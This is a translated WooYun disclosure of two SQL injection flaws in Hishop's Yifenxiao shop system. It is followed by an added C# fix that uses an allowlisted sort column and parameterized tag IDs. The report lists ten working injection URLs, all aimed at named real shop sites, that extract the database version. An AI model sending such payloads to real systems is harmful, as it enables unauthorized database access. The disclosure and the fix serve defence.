
Vulnerability summary

Defect ID: wooyun-2015-0135720

Vulnerability title: Hishop 易分销 (Yifenxiao distribution) system SQL injection *2

Related vendor: Hishop

Vulnerability author: 路人甲

Submitted: 2015-08-21 14:48

Fix time: 2015-10-05 14:50

Public time: 2015-10-05 14:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-10-05: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The key lies in the closing technique (correctly closing the surrounding SQL syntax).

Detailed description:

Having seen WooYun: hishop易分销系统sql注入一枚 (an earlier report of a SQL injection in the Hishop 易分销 system), I tested it myself and found two more SQL injections.
As that previous expert said, there really are a lot of deployments and a large user base.
SQL 1:
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts: injection in the sortOrderBy parameter
Here the surrounding query has to be closed correctly before injection works, and the closing needed may differ from site to site; I'll use five cases to illustrate.

http://eyigo.com/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://spt.0351tao.cn/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://www.gzkorea.com/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://feihongzhixin.mall.hjhl.cn/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://www.xdhome.com/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --


1.png


SQL 2:
/ProductUnSales.aspx?keywords=wooyun&tagIds=1_2&pageIndex=1: injection in the tagIds parameter
A few more cases to illustrate:

http://qmhy.com.cn/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://spt.0351tao.cn/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://yuntoys.cn/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://5upf.com/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://www.miegs.com/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1


2.png

Proof of vulnerability:

1.png


2.png

Fix recommendation:
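The report leaves the fix section empty. As an added defensive example (not Hishop's code), the following C# shows how the two injected parameters can be handled on an ASP.NET/SQL Server stack: sortOrderBy is resolved against an allowlist of column names before it is placed in ORDER BY, and tagIds is parsed into integers and bound as parameters, so the ")) T WHERE ..." closing seen in the report can never reach the query. Only the view name vw_Hishop_BrowseProductList, the SaleStatus filter and the ROW_NUMBER paging shape are taken from the query fragment visible in the report; the columns SalePrice, DisplayName, TagId and ProductName and the page size are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
// Added example, not Hishop's code: view name, SaleStatus and ROW_NUMBER paging come from the report; other columns are assumed.
public static class SafeProductQuery
{
    // Allowlist of the only identifiers that may reach ORDER BY (values are the canonical names).
    private static readonly Dictionary<string, string> SortColumns =
        new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase)
        { ["VistiCounts"] = "VistiCounts", ["SalePrice"] = "SalePrice", ["DisplayName"] = "DisplayName" };
    // Anything not allowlisted, e.g. "VistiCounts Desc) AS RowNumber ...", falls back to the default.
    public static string ResolveSortColumn(string sortOrderBy) =>
        SortColumns.TryGetValue((sortOrderBy ?? "").Trim(), out string col) ? col : "VistiCounts";
    // tagIds must be underscore-separated integers; "1_2)) T WHERE ..." fails int.TryParse and is rejected.
    public static List<int> ParseTagIds(string tagIds)
    {
        var ids = new List<int>();
        foreach (string part in (tagIds ?? "").Split(new[] { '_' }, StringSplitOptions.RemoveEmptyEntries))
        {
            if (!int.TryParse(part, out int id))
                throw new ArgumentException("tagIds must be underscore-separated integers");
            ids.Add(id);
        }
        return ids;
    }
    // Every user value is bound as a parameter; the sort column is the only dynamic fragment.
    public static SqlCommand BuildCommand(SqlConnection conn, string keywords, string tagIds,
                                          string sortOrderBy, int pageIndex, int pageSize = 20)
    {
        List<int> ids = ParseTagIds(tagIds);
        SqlCommand cmd = conn.CreateCommand();
        var tagParams = new List<string>();
        for (int i = 0; i < ids.Count; i++)
        {
            tagParams.Add("@tag" + i);
            cmd.Parameters.Add("@tag" + i, SqlDbType.Int).Value = ids[i];
        }
        string tagFilter = tagParams.Count > 0 ? " AND p.TagId IN (" + string.Join(",", tagParams) + ")" : "";
        cmd.CommandText =
            "SELECT * FROM (SELECT p.*, ROW_NUMBER() OVER (ORDER BY p." + ResolveSortColumn(sortOrderBy) +
            " DESC) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE p.SaleStatus = 1" +
            " AND p.ProductName LIKE @kw" + tagFilter + ") T WHERE T.RowNumber BETWEEN @first AND @last";
        cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 200).Value = "%" + (keywords ?? "") + "%";
        int page = Math.Max(pageIndex, 1);
        cmd.Parameters.Add("@first", SqlDbType.Int).Value = (page - 1) * pageSize + 1;
        cmd.Parameters.Add("@last", SqlDbType.Int).Value = page * pageSize;
        return cmd;
    }
}
```

With this shape, a request carrying either of the report's payloads either sorts by the default column or is rejected with an ArgumentException before any SQL is sent, which is also a convenient point to log the rejected value for detection.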

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused to respond